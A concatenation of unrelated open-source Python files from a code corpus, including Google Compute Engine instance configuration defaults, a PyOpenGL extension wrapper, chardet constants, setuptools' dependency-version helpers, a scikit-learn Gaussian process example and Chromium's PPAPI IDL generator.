# dynamically load any plugins from the playbook directory
for name, obj in get_all_plugin_loaders():
if obj.subdir:
plugin_path = os.path.join('.', obj.subdir)
if os.path.isdir(plugin_path):
obj.add_directory(plugin_path)
play_ds = self._play_ds(pattern, self.options.seconds, self.options.poll_interval)
play = Play().load(play_ds, variable_manager=variable_manager, loader=loader)
if self.callback:
cb = self.callback
elif self.options.one_line:
cb = 'oneline'
else:
cb = 'minimal'
run_tree=False
if self.options.tree:
C.DEFAULT_CALLBACK_WHITELIST.append('tree')
C.TREE_DIR = self.options.tree
run_tree=True
# now create a task queue manager to execute the play
self._tqm = None
try:
self._tqm = TaskQueueManager(
inventory=inventory,
variable_manager=variable_manager,
loader=loader,
options=self.options,
passwords=passwords,
stdout_callback=cb,
run_additional_callbacks=C.DEFAULT_LOAD_CALLBACK_PLUGINS,
run_tree=run_tree,
)
result = self._tqm.run(play)
finally:
if self._tqm:
self._tqm.cleanup()
return result
| gpl-3.0 |
wrigri/compute-image-packages | packages/python-google-compute-engine/google_compute_engine/instance_setup/instance_config.py | 6 | 6415 | #!/usr/bin/python
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A library used to set up the instance's default configurations file.
Note that the configurations in
/etc/default/instance_configs.cfg.template override the values set in
/etc/default/instance_configs.cfg. The system instance_configs.cfg may be
overridden during package upgrade.
"""
import logging
import os
from google_compute_engine import config_manager
from google_compute_engine import constants
from google_compute_engine.compat import parser
from google_compute_engine.compat import stringio
class InstanceConfig(config_manager.ConfigManager):
  """Creates a defaults config file for instance configuration."""

  # Final on-disk config and its distro-provided / template companions.
  instance_config = constants.SYSCONFDIR + '/instance_configs.cfg'
  instance_config_distro = '%s.distro' % instance_config
  instance_config_template = '%s.template' % instance_config
  # Absolute path of this script; interpolated into the header below.
  instance_config_script = os.path.abspath(__file__)
  instance_config_header = (
      'This file is automatically created at boot time by the %s script. Do '
      'not edit this file directly. If you need to add items to this file, '
      'create or edit %s instead and then run '
      '/usr/bin/google_instance_setup.')
  # Lowest-precedence built-in defaults; merged last in __init__.
  instance_config_options = {
      'Accounts': {
          'deprovision_remove': 'false',
          'groups': 'adm,dip,docker,lxd,plugdev,video',

          # The encrypted password is set to '*' for SSH on Linux systems
          # without PAM.
          #
          # SSH uses '!' as its locked account token:
          # https://github.com/openssh/openssh-portable/blob/master/configure.ac
          #
          # When the token is specified, SSH denies login:
          # https://github.com/openssh/openssh-portable/blob/master/auth.c
          #
          # To solve the issue, make the password '*' which is also recognized
          # as locked but does not prevent SSH login.
          'gpasswd_add_cmd': 'gpasswd -a {user} {group}',
          'gpasswd_remove_cmd': 'gpasswd -d {user} {group}',
          'groupadd_cmd': 'groupadd {group}',
          'useradd_cmd': 'useradd -m -s /bin/bash -p * {user}',
          'userdel_cmd': 'userdel -r {user}',
          'usermod_cmd': 'usermod -G {groups} {user}',
      },
      'Daemons': {
          'accounts_daemon': 'true',
          'clock_skew_daemon': 'true',
          'ip_forwarding_daemon': 'true',  # Deprecated.
          'network_daemon': 'true',
      },
      'Instance': {
          'instance_id': '0',
      },
      'InstanceSetup': {
          'host_key_types': 'ecdsa,ed25519,rsa',
          'optimize_local_ssd': 'true',
          'network_enabled': 'true',
          # WARNING: Do not change the value of 'set_boto_config' without first
          # consulting the gsutil team (GoogleCloudPlatform/gsutil).
          'set_boto_config': 'true',
          'set_host_keys': 'true',
          'set_multiqueue': 'true',
      },
      'IpForwarding': {
          'ethernet_proto_id': '66',
          'ip_aliases': 'true',
          'target_instance_ips': 'true',
      },
      'MetadataScripts': {
          'run_dir': '',
          'startup': 'true',
          'shutdown': 'true',
          'default_shell': '/bin/bash',
      },
      'NetworkInterfaces': {
          'setup': 'true',
          'ip_forwarding': 'true',
          'dhcp_command': '',
          'dhclient_script': '/sbin/google-dhclient-script',
      },
  }

  def __init__(self, logger=logging, instance_config_metadata=None):
    """Constructor.

    Inherit from the ConfigManager class. Read the template for instance
    defaults and write new sections and options. This prevents package
    updates from overriding user set defaults.

    Args:
      logger: logger object, used to write to SysLog and serial port.
          NOTE: the default is the 'logging' module itself, which exposes a
          compatible error() function.
      instance_config_metadata: string, a config file specified in metadata.
    """
    self.logger = logger
    self.instance_config_metadata = instance_config_metadata
    # Fill in the header's script path and template path; the formatted
    # string becomes an instance attribute shadowing the class attribute.
    self.instance_config_header %= (
        self.instance_config_script, self.instance_config_template)
    # User provided instance configs should always take precedence.
    super(InstanceConfig, self).__init__(
        config_file=self.instance_config_template,
        config_header=self.instance_config_header)

    # Use the instance config settings from metadata if specified. Then use
    # settings in an instance config file if one exists. If a config
    # file does not already exist, try to use the distro provided defaults. If
    # no file exists, use the default configuration settings.
    config_files = [self.instance_config, self.instance_config_distro]
    config_defaults = []
    if self.instance_config_metadata:
      config = parser.Parser()
      try:
        config.read_file(stringio.StringIO(self.instance_config_metadata))
      except parser.Error as e:
        # Parse errors are logged but non-fatal; later sources still apply.
        self.logger.error('Error parsing metadata configs: %s', str(e))
      else:
        config_defaults.append(
            dict((s, dict(config.items(s))) for s in config.sections()))
    for config_file in config_files:
      if os.path.exists(config_file):
        config = parser.Parser()
        try:
          config.read(config_file)
        except parser.Error as e:
          self.logger.error('Error parsing config file: %s', str(e))
        else:
          config_defaults.append(
              dict((s, dict(config.items(s))) for s in config.sections()))
    config_defaults.append(self.instance_config_options)

    # overwrite=False means earlier (higher-precedence) sources win: metadata,
    # then existing config files, then the built-in defaults.
    for defaults in config_defaults:
      for section, options in sorted(defaults.items()):
        for option, value in sorted(options.items()):
          super(InstanceConfig, self).SetOption(
              section, option, value, overwrite=False)

  def WriteConfig(self):
    """Write the config values to the instance defaults file."""
    super(InstanceConfig, self).WriteConfig(config_file=self.instance_config)
| apache-2.0 |
mwmuni/LIGGGHTS_GUI | OpenGL/GL/APPLE/flush_buffer_range.py | 9 | 1911 | '''OpenGL extension APPLE.flush_buffer_range
This module customises the behaviour of the
OpenGL.raw.GL.APPLE.flush_buffer_range to provide a more
Python-friendly API
Overview (from the spec)
APPLE_flush_buffer_range expands the buffer object API to allow greater
performance when a client application only needs to write to a sub-range
of a buffer object. To that end, this extension introduces two new buffer
object features: non-serialized buffer modification and explicit sub-range
flushing for mapped buffer objects.
OpenGL requires that commands occur in a FIFO manner meaning that any
changes to buffer objects either block until the data has been processed by
the OpenGL pipeline or else create extra copies to avoid such a block. By
providing a method to asynchronously modify buffer object data, an
application is then able to manage the synchronization points themselves
and modify ranges of data contained by a buffer object even though OpenGL
might still be using other parts of it.
This extension also provides a method for explicitly flushing ranges of a
mapped buffer object so OpenGL does not have to assume that the entire
range may have been modified.
Affects ARB_vertex_buffer_object, ARB_pixel_buffer_object and OpenGL 1.5
Buffer Objects.
The official definition of this extension is available here:
http://www.opengl.org/registry/specs/APPLE/flush_buffer_range.txt
'''
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GL import _types, _glgets
from OpenGL.raw.GL.APPLE.flush_buffer_range import *
from OpenGL.raw.GL.APPLE.flush_buffer_range import _EXTENSION_NAME
def glInitFlushBufferRangeAPPLE():
    """Report whether the GL_APPLE_flush_buffer_range extension is available.

    Returns a boolean: True when the current GL context advertises the
    extension, False otherwise.
    """
    from OpenGL import extensions as _extensions
    return _extensions.hasGLExtension(_EXTENSION_NAME)
### END AUTOGENERATED SECTION | gpl-3.0 |
MQQiang/kbengine | kbe/res/scripts/common/Lib/site-packages/pip/_vendor/requests/packages/chardet/constants.py | 3008 | 1335 | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Universal charset detector code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 2001
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
# Shy Shalom - original C code
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
# Non-zero enables extra debugging output in the detector implementations.
_debug = 0

# Detector-level result states (presumably returned while feeding data to a
# prober: still detecting, charset identified, charset ruled out).
eDetecting = 0
eFoundIt = 1
eNotMe = 2

# Coding state machine states: scanning, invalid byte sequence seen, or the
# sequence uniquely identifies this encoding.
eStart = 0
eError = 1
eItsMe = 2

# Confidence threshold above which detection can stop early.
# NOTE(review): the exact usage lives in the prober modules — confirm there.
SHORTCUT_THRESHOLD = 0.95
| lgpl-3.0 |
compiteing/flask-ponypermission | venv/lib/python2.7/site-packages/setuptools/depends.py | 462 | 6370 | import sys
import imp
import marshal
from imp import PKG_DIRECTORY, PY_COMPILED, PY_SOURCE, PY_FROZEN
from distutils.version import StrictVersion
from setuptools import compat
__all__ = [
'Require', 'find_module', 'get_module_constant', 'extract_constant'
]
class Require:
    """A prerequisite to building or installing a distribution."""

    def __init__(self, name, requested_version, module, homepage='',
                 attribute=None, format=None):
        # Default format: parse versions with StrictVersion when a version
        # was requested but no explicit parser was given.
        if format is None and requested_version is not None:
            format = StrictVersion
        # Normalize the requested version through the chosen parser.
        if format is not None:
            requested_version = format(requested_version)
        # By convention, modules expose their version as __version__.
        if attribute is None:
            attribute = '__version__'
        self.name = name
        self.requested_version = requested_version
        self.module = module
        self.homepage = homepage
        self.attribute = attribute
        self.format = format

    def full_name(self):
        """Return full package/distribution name, w/version"""
        if self.requested_version is None:
            return self.name
        return '%s-%s' % (self.name, self.requested_version)

    def version_ok(self, version):
        """Is 'version' sufficiently up-to-date?"""
        # Without an attribute or a format there is nothing to compare, so
        # any installed copy is acceptable.
        if self.attribute is None or self.format is None:
            return True
        return str(version) != "unknown" and version >= self.requested_version

    def get_version(self, paths=None, default="unknown"):
        """Get version number of installed module, 'None', or 'default'

        Search 'paths' for module.  If not found, return 'None'.  If found,
        return the extracted version attribute, or 'default' if no version
        attribute was specified, or the value cannot be determined without
        importing the module.  The version is formatted according to the
        requirement's version format (if any), unless it is 'None' or the
        supplied 'default'.
        """
        if self.attribute is None:
            # Presence check only: locate the module without importing it.
            try:
                f, p, i = find_module(self.module, paths)
            except ImportError:
                return None
            if f:
                f.close()
            return default

        version = get_module_constant(self.module, self.attribute, default,
                                      paths)
        if version is not None and version is not default \
                and self.format is not None:
            return self.format(version)
        return version

    def is_present(self, paths=None):
        """Return true if dependency is present on 'paths'"""
        return self.get_version(paths) is not None

    def is_current(self, paths=None):
        """Return true if dependency is present and up-to-date on 'paths'"""
        version = self.get_version(paths)
        return version is not None and self.version_ok(version)
def _iter_code(code):
    """Yield '(op,arg)' pair for each operation in code object 'code'"""

    from array import array
    from dis import HAVE_ARGUMENT, EXTENDED_ARG

    # NOTE(review): 'b' is a *signed* byte array, so opcodes >= 128 come out
    # negative and are misclassified below as argument-less — harmless for
    # the opcodes extract_constant() cares about (all < 128), but it can
    # desynchronize the pointer arithmetic on other code.
    # NOTE(review): this decoder assumes the pre-3.6 CPython layout (1-byte
    # opcode + 2-byte little-endian argument); it does not understand the
    # 2-byte "wordcode" used by CPython 3.6+.
    bytes = array('b',code.co_code)
    eof = len(code.co_code)

    ptr = 0
    extended_arg = 0

    while ptr<eof:

        op = bytes[ptr]

        if op>=HAVE_ARGUMENT:

            arg = bytes[ptr+1] + bytes[ptr+2]*256 + extended_arg
            ptr += 3

            if op==EXTENDED_ARG:
                # Accumulate the high 16 bits for the next real instruction.
                extended_arg = arg * compat.long_type(65536)
                continue

        else:
            arg = None
            ptr += 1

        yield op,arg
def find_module(module, paths=None):
    """Just like 'imp.find_module()', but with package support

    Walks each dotted component of 'module', descending into packages.
    Returns the (file, path, description) triple for the final component.

    NOTE(review): built on the deprecated 'imp' module, which was removed in
    Python 3.12.
    """

    parts = module.split('.')

    while parts:
        part = parts.pop(0)
        f, path, (suffix,mode,kind) = info = imp.find_module(part, paths)

        if kind==PKG_DIRECTORY:
            # Descend into the package; if no components remain, resolve the
            # package itself via its __init__.
            parts = parts or ['__init__']
            paths = [path]

        elif parts:
            # A non-package was found but dotted components remain.
            raise ImportError("Can't find %r in %s" % (parts,module))

    return info
def get_module_constant(module, symbol, default=-1, paths=None):
    """Find 'module' by searching 'paths', and extract 'symbol'

    Return 'None' if 'module' does not exist on 'paths', or it does not define
    'symbol'.  If the module defines 'symbol' as a constant, return the
    constant.  Otherwise, return 'default'."""

    try:
        f, path, (suffix, mode, kind) = find_module(module, paths)
    except ImportError:
        # Module doesn't exist
        return None

    try:
        if kind==PY_COMPILED:
            f.read(8)   # skip magic & date
            code = marshal.load(f)
        elif kind==PY_FROZEN:
            code = imp.get_frozen_object(module)
        elif kind==PY_SOURCE:
            code = compile(f.read(), path, 'exec')
        else:
            # Not something we can parse; we'll have to import it.  :(
            if module not in sys.modules:
                imp.load_module(module, f, path, (suffix, mode, kind))
            return getattr(sys.modules[module], symbol, None)

    finally:
        # 'f' is None for packages and built-ins; close it when present.
        if f:
            f.close()

    # Scan the bytecode for a constant assignment without executing it.
    return extract_constant(code, symbol, default)
def extract_constant(code, symbol, default=-1):
    """Extract the constant value of 'symbol' from 'code'

    If the name 'symbol' is bound to a constant value by the Python code
    object 'code', return that value.  If 'symbol' is bound to an expression,
    return 'default'.  Otherwise, return 'None'.

    Return value is based on the first assignment to 'symbol'.  'symbol' must
    be a global, or at least a non-"fast" local in the code block.  That is,
    only 'STORE_NAME' and 'STORE_GLOBAL' opcodes are checked, and 'symbol'
    must be present in 'code.co_names'.
    """

    if symbol not in code.co_names:
        # name's not there, can't possibly be an assignment
        return None

    name_idx = list(code.co_names).index(symbol)

    # Hard-coded opcode numbers for the pre-3.6 bytecode that _iter_code()
    # decodes; see the notes on _iter_code for compatibility caveats.
    STORE_NAME = 90
    STORE_GLOBAL = 97
    LOAD_CONST = 100

    const = default

    for op, arg in _iter_code(code):

        if op==LOAD_CONST:
            # Remember the most recently loaded constant; if the very next
            # store targets 'symbol', this is its value.
            const = code.co_consts[arg]
        elif arg==name_idx and (op==STORE_NAME or op==STORE_GLOBAL):
            return const
        else:
            # Any other instruction breaks the LOAD_CONST/STORE pairing.
            const = default
def _update_globals():
"""
Patch the globals to remove the objects not available on some platforms.
XXX it'd be better to test assertions about bytecode instead.
"""
if not sys.platform.startswith('java') and sys.platform != 'cli':
return
incompatible = 'extract_constant', 'get_module_constant'
for name in incompatible:
del globals()[name]
__all__.remove(name)
_update_globals()
| mit |
mehdidc/scikit-learn | examples/gaussian_process/plot_gp_regression.py | 253 | 4054 | #!/usr/bin/python
# -*- coding: utf-8 -*-
r"""
=========================================================
Gaussian Processes regression: basic introductory example
=========================================================
A simple one-dimensional regression exercise computed in two different ways:
1. A noise-free case with a cubic correlation model
2. A noisy case with a squared Euclidean correlation model
In both cases, the model parameters are estimated using the maximum
likelihood principle.
The figures illustrate the interpolating property of the Gaussian Process
model as well as its probabilistic nature in the form of a pointwise 95%
confidence interval.
Note that the parameter ``nugget`` is applied as a Tikhonov regularization
of the assumed covariance between the training points. In the special case
of the squared euclidean correlation model, nugget is mathematically equivalent
to a normalized variance: That is
.. math::
\mathrm{nugget}_i = \left[\frac{\sigma_i}{y_i}\right]^2
"""
print(__doc__)
# Author: Vincent Dubourg <vincent.dubourg@gmail.com>
# Jake Vanderplas <vanderplas@astro.washington.edu>
# Licence: BSD 3 clause
import numpy as np
from sklearn.gaussian_process import GaussianProcess
from matplotlib import pyplot as pl
np.random.seed(1)
def f(x):
    """Target function to predict: f(x) = x * sin(x).

    Accepts a scalar or a numpy array and returns a value of the same shape.
    """
    return np.multiply(x, np.sin(x))
#----------------------------------------------------------------------
# First the noiseless case: fit on six exact samples of f.
X = np.atleast_2d([1., 3., 5., 6., 7., 8.]).T

# Observations
y = f(X).ravel()

# Mesh the input space for evaluations of the real function, the prediction and
# its MSE
x = np.atleast_2d(np.linspace(0, 10, 1000)).T

# Instantiate a Gaussian Process model
# NOTE(review): sklearn.gaussian_process.GaussianProcess is the legacy API
# (superseded by GaussianProcessRegressor in modern scikit-learn).
gp = GaussianProcess(corr='cubic', theta0=1e-2, thetaL=1e-4, thetaU=1e-1,
                     random_start=100)

# Fit to data using Maximum Likelihood Estimation of the parameters
gp.fit(X, y)

# Make the prediction on the meshed x-axis (ask for MSE as well)
y_pred, MSE = gp.predict(x, eval_MSE=True)
sigma = np.sqrt(MSE)

# Plot the function, the prediction and the 95% confidence interval based on
# the MSE.  1.96 * sigma gives the pointwise 95% band.
# NOTE(review): '\,' and '\s' in the non-raw label literals are not valid
# Python escapes (they pass through unchanged today, but raw strings r'...'
# would be safer).
fig = pl.figure()
pl.plot(x, f(x), 'r:', label=u'$f(x) = x\,\sin(x)$')
pl.plot(X, y, 'r.', markersize=10, label=u'Observations')
pl.plot(x, y_pred, 'b-', label=u'Prediction')
pl.fill(np.concatenate([x, x[::-1]]),
        np.concatenate([y_pred - 1.9600 * sigma,
                        (y_pred + 1.9600 * sigma)[::-1]]),
        alpha=.5, fc='b', ec='None', label='95% confidence interval')
pl.xlabel('$x$')
pl.ylabel('$f(x)$')
pl.ylim(-10, 20)
pl.legend(loc='upper left')

#----------------------------------------------------------------------
# now the noisy case: 20 samples with heteroscedastic Gaussian noise.
X = np.linspace(0.1, 9.9, 20)
X = np.atleast_2d(X).T

# Observations and noise
y = f(X).ravel()
dy = 0.5 + 1.0 * np.random.random(y.shape)
noise = np.random.normal(0, dy)
y += noise

# Mesh the input space for evaluations of the real function, the prediction and
# its MSE
x = np.atleast_2d(np.linspace(0, 10, 1000)).T

# Instantiate a Gaussian Process model.  The nugget is the per-point
# normalized variance (see the module docstring).
gp = GaussianProcess(corr='squared_exponential', theta0=1e-1,
                     thetaL=1e-3, thetaU=1,
                     nugget=(dy / y) ** 2,
                     random_start=100)

# Fit to data using Maximum Likelihood Estimation of the parameters
gp.fit(X, y)

# Make the prediction on the meshed x-axis (ask for MSE as well)
y_pred, MSE = gp.predict(x, eval_MSE=True)
sigma = np.sqrt(MSE)

# Plot the function, the prediction and the 95% confidence interval based on
# the MSE
fig = pl.figure()
pl.plot(x, f(x), 'r:', label=u'$f(x) = x\,\sin(x)$')
pl.errorbar(X.ravel(), y, dy, fmt='r.', markersize=10, label=u'Observations')
pl.plot(x, y_pred, 'b-', label=u'Prediction')
pl.fill(np.concatenate([x, x[::-1]]),
        np.concatenate([y_pred - 1.9600 * sigma,
                        (y_pred + 1.9600 * sigma)[::-1]]),
        alpha=.5, fc='b', ec='None', label='95% confidence interval')
pl.xlabel('$x$')
pl.ylabel('$f(x)$')
pl.ylim(-10, 20)
pl.legend(loc='upper left')

pl.show()
| bsd-3-clause |
AICP/external_chromium_org | tools/json_schema_compiler/ppapi_generator.py | 37 | 10976 | # Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import collections
import datetime
import os.path
import sys
import code
import cpp_util
import model
try:
import jinja2
except ImportError:
sys.path.append(os.path.join(os.path.dirname(__file__), '..', '..',
'third_party'))
import jinja2
class _PpapiGeneratorBase(object):
  """A base class for ppapi generators.

  Implementations should set TEMPLATE_NAME to a string containing the name of
  the template file without its extension. The template will be rendered with
  the following symbols available:
    name: A string containing the name of the namespace.
    enums: A list of enums within the namespace.
    types: A list of types within the namespace, sorted such that no element
      depends on an earlier element.
    events: A dict of events within the namespace.
    functions: A dict of functions within the namespace.
    year: An int containing the current year.
    source_file: The name of the input file.

  NOTE(review): uses dict.itervalues(), so this module is Python 2 only.
  """

  def __init__(self, namespace):
    self._namespace = namespace
    # Maps a type's fully-qualified name tuple to the model type that must be
    # emitted for it.
    self._required_types = {}
    # Name tuples that additionally need array / optional / optional-array
    # typedefs in the generated output.
    self._array_types = set()
    self._optional_types = set()
    self._optional_array_types = set()
    # Maps a name tuple to the set of name tuples it depends on; consumed by
    # the topological sort in _ResolveTypeDependencies().
    self._dependencies = collections.OrderedDict()
    self._types = []
    self._enums = []
    self.jinja_environment = jinja2.Environment(
        loader=jinja2.FileSystemLoader(os.path.join(os.path.dirname(__file__),
                                                    'templates', 'ppapi')))
    self._SetupFilters()
    self._ResolveTypeDependencies()

  def _SetupFilters(self):
    # Filters exposed to the Jinja templates; keys match their usage in the
    # *.template files.
    self.jinja_environment.filters.update({
        'ppapi_type': self.ToPpapiType,
        'classname': cpp_util.Classname,
        'enum_value': self.EnumValueName,
        'return_type': self.GetFunctionReturnType,
        'format_param_type': self.FormatParamType,
        'needs_optional': self.NeedsOptional,
        'needs_array': self.NeedsArray,
        'needs_optional_array': self.NeedsOptionalArray,
        'has_array_outs': self.HasArrayOuts,
    })

  def Render(self, template_name, values):
    # Renders '<template_name>.template' with 'values' into a Code object.
    generated_code = code.Code()
    template = self.jinja_environment.get_template(
        '%s.template' % template_name)
    generated_code.Append(template.render(values))
    return generated_code

  def Generate(self):
    """Generates a Code object for a single namespace."""
    return self.Render(self.TEMPLATE_NAME, {
        'name': self._namespace.name,
        'enums': self._enums,
        'types': self._types,
        'events': self._namespace.events,
        'functions': self._namespace.functions,
        # TODO(sammc): Don't change years when regenerating existing output
        # files.
        'year': datetime.date.today().year,
        'source_file': self._namespace.source_file,
    })

  def _ResolveTypeDependencies(self):
    """Calculates the transitive closure of the types in _required_types.

    Returns a tuple containing the list of struct types and the list of enum
    types. The list of struct types is ordered such that no type depends on a
    type later in the list.

    NOTE(review): despite the docstring, this populates self._types and
    self._enums in place rather than returning a tuple.
    """
    # Seed _required_types from every function and event signature.
    if self._namespace.functions:
      for function in self._namespace.functions.itervalues():
        self._FindFunctionDependencies(function)
    if self._namespace.events:
      for event in self._namespace.events.itervalues():
        self._FindFunctionDependencies(event)
    # Expand member dependencies until no new types are discovered.
    resolved_types = set()
    while resolved_types < set(self._required_types):
      for typename in sorted(set(self._required_types) - resolved_types):
        type_ = self._required_types[typename]
        self._dependencies.setdefault(typename, set())
        for member in type_.properties.itervalues():
          self._RegisterDependency(member, self._NameComponents(type_))
        resolved_types.add(typename)
    # Topological sort: repeatedly emit a type with no outstanding
    # dependencies and remove it from every remaining dependency set.
    while self._dependencies:
      for name, deps in self._dependencies.items():
        if not deps:
          if (self._required_types[name].property_type ==
              model.PropertyType.ENUM):
            self._enums.append(self._required_types[name])
          else:
            self._types.append(self._required_types[name])
          for deps in self._dependencies.itervalues():
            deps.discard(name)
          del self._dependencies[name]
          break
      else:
        # No emittable type was found in a full pass: there is a cycle.
        raise ValueError('Circular dependency %s' % self._dependencies)

  def _FindFunctionDependencies(self, function):
    # Parameters, callback parameters and the return value can each pull in
    # struct/enum types.
    for param in function.params:
      self._RegisterDependency(param, None)
    if function.callback:
      for param in function.callback.params:
        self._RegisterDependency(param, None)
    if function.returns:
      self._RegisterTypeDependency(function.returns, None, False, False)

  def _RegisterDependency(self, member, depender):
    self._RegisterTypeDependency(member.type_, depender, member.optional,
                                 False)

  def _RegisterTypeDependency(self, type_, depender, optional, array):
    if type_.property_type == model.PropertyType.ARRAY:
      # An array depends on its element type; record the array context.
      self._RegisterTypeDependency(type_.item_type, depender, optional, True)
    elif type_.property_type == model.PropertyType.REF:
      # Follow references to the concrete type they name.
      self._RegisterTypeDependency(self._namespace.types[type_.ref_type],
                                   depender, optional, array)
    elif type_.property_type in (model.PropertyType.OBJECT,
                                 model.PropertyType.ENUM):
      name_components = self._NameComponents(type_)
      self._required_types[name_components] = type_
      if depender:
        self._dependencies.setdefault(depender, set()).add(
            name_components)
      # Track which wrapper typedefs (array/optional) must be generated.
      if array:
        self._array_types.add(name_components)
        if optional:
          self._optional_array_types.add(name_components)
      elif optional:
        self._optional_types.add(name_components)

  @staticmethod
  def _NameComponents(entity):
    """Returns a tuple of the fully-qualified name of an entity."""
    names = []
    while entity:
      # Array wrappers are transparent for naming purposes.
      if (not isinstance(entity, model.Type) or
          entity.property_type != model.PropertyType.ARRAY):
        names.append(entity.name)
      entity = entity.parent
    # Drop the outermost (namespace) component and restore outer-to-inner
    # order.
    return tuple(reversed(names[:-1]))

  def ToPpapiType(self, type_, array=False, optional=False):
    """Returns a string containing the name of the Pepper C type for |type_|.

    If array is True, returns the name of an array of |type_|. If optional is
    True, returns the name of an optional |type_|. If both array and optional
    are True, returns the name of an optional array of |type_|.
    """
    if isinstance(type_, model.Function) or type_.property_type in (
        model.PropertyType.OBJECT, model.PropertyType.ENUM):
      # Named types get a namespace-qualified PP_* name.
      return self._FormatPpapiTypeName(
          array, optional, '_'.join(
              cpp_util.Classname(s) for s in self._NameComponents(type_)),
          namespace=cpp_util.Classname(self._namespace.name))
    elif type_.property_type == model.PropertyType.REF:
      return self.ToPpapiType(self._namespace.types[type_.ref_type],
                              optional=optional, array=array)
    elif type_.property_type == model.PropertyType.ARRAY:
      return self.ToPpapiType(type_.item_type, array=True,
                              optional=optional)
    elif type_.property_type == model.PropertyType.STRING and not array:
      return 'PP_Var'
    elif array or optional:
      if type_.property_type in self._PPAPI_COMPOUND_PRIMITIVE_TYPE_MAP:
        return self._FormatPpapiTypeName(
            array, optional,
            self._PPAPI_COMPOUND_PRIMITIVE_TYPE_MAP[type_.property_type], '')
    # Plain primitives; anything unrecognized falls back to PP_Var.
    return self._PPAPI_PRIMITIVE_TYPE_MAP.get(type_.property_type, 'PP_Var')

  # C type names for plain (non-array, non-optional) primitives.
  _PPAPI_PRIMITIVE_TYPE_MAP = {
      model.PropertyType.BOOLEAN: 'PP_Bool',
      model.PropertyType.DOUBLE: 'double_t',
      model.PropertyType.INT64: 'int64_t',
      model.PropertyType.INTEGER: 'int32_t',
  }
  # Name fragments used when a primitive appears inside an array/optional
  # wrapper typedef.
  _PPAPI_COMPOUND_PRIMITIVE_TYPE_MAP = {
      model.PropertyType.BOOLEAN: 'Bool',
      model.PropertyType.DOUBLE: 'Double',
      model.PropertyType.INT64: 'Int64',
      model.PropertyType.INTEGER: 'Int32',
      model.PropertyType.STRING: 'String',
  }

  @staticmethod
  def _FormatPpapiTypeName(array, optional, name, namespace=''):
    # Assembles 'PP_[<Namespace>_][Optional_]<Name>[_Array]'.
    if namespace:
      namespace = '%s_' % namespace
    if array:
      if optional:
        return 'PP_%sOptional_%s_Array' % (namespace, name)
      return 'PP_%s%s_Array' % (namespace, name)
    if optional:
      return 'PP_%sOptional_%s' % (namespace, name)
    return 'PP_%s%s' % (namespace, name)

  def NeedsOptional(self, type_):
    """Returns True if an optional |type_| is required."""
    return self._NameComponents(type_) in self._optional_types

  def NeedsArray(self, type_):
    """Returns True if an array of |type_| is required."""
    return self._NameComponents(type_) in self._array_types

  def NeedsOptionalArray(self, type_):
    """Returns True if an optional array of |type_| is required."""
    return self._NameComponents(type_) in self._optional_array_types

  def FormatParamType(self, param):
    """Formats the type of a parameter or property."""
    return self.ToPpapiType(param.type_, optional=param.optional)

  @staticmethod
  def GetFunctionReturnType(function):
    # Functions with a callback or a declared return value are mapped to an
    # int32_t result; everything else is void.  (Presumably the PPAPI
    # completion-callback convention — confirm against the templates.)
    return 'int32_t' if function.callback or function.returns else 'void'

  def EnumValueName(self, enum_value, enum_type):
    """Returns a string containing the name for an enum value."""
    return '%s_%s' % (self.ToPpapiType(enum_type).upper(),
                      enum_value.name.upper())

  def _ResolveType(self, type_):
    # Strips REF and ARRAY wrappers until a concrete type remains.
    if type_.property_type == model.PropertyType.REF:
      return self._ResolveType(self._namespace.types[type_.ref_type])
    if type_.property_type == model.PropertyType.ARRAY:
      return self._ResolveType(type_.item_type)
    return type_

  def _IsOrContainsArray(self, type_):
    # True if |type_| is an array or transitively contains one via object
    # properties.
    if type_.property_type == model.PropertyType.ARRAY:
      return True
    type_ = self._ResolveType(type_)
    if type_.property_type == model.PropertyType.OBJECT:
      return any(self._IsOrContainsArray(param.type_)
                 for param in type_.properties.itervalues())
    return False

  def HasArrayOuts(self, function):
    """Returns True if the function produces any arrays as outputs.

    This includes arrays that are properties of other objects.
    """
    if function.callback:
      for param in function.callback.params:
        if self._IsOrContainsArray(param.type_):
          return True
    return function.returns and self._IsOrContainsArray(function.returns)
class _IdlGenerator(_PpapiGeneratorBase):
  # Renders a namespace through the 'idl.template' template.
  TEMPLATE_NAME = 'idl'
class _GeneratorWrapper(object):
def __init__(self, generator_factory):
self._generator_factory = generator_factory
def Generate(self, namespace):
return self._generator_factory(namespace).Generate()
class PpapiGenerator(object):
  """Top-level entry point exposing the supported PPAPI output formats."""

  def __init__(self):
    # IDL output; wrapped so each namespace gets its own generator instance.
    self.idl_generator = _GeneratorWrapper(_IdlGenerator)
axbaretto/beam | sdks/python/apache_beam/runners/worker/statesampler.py | 5 | 5922 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
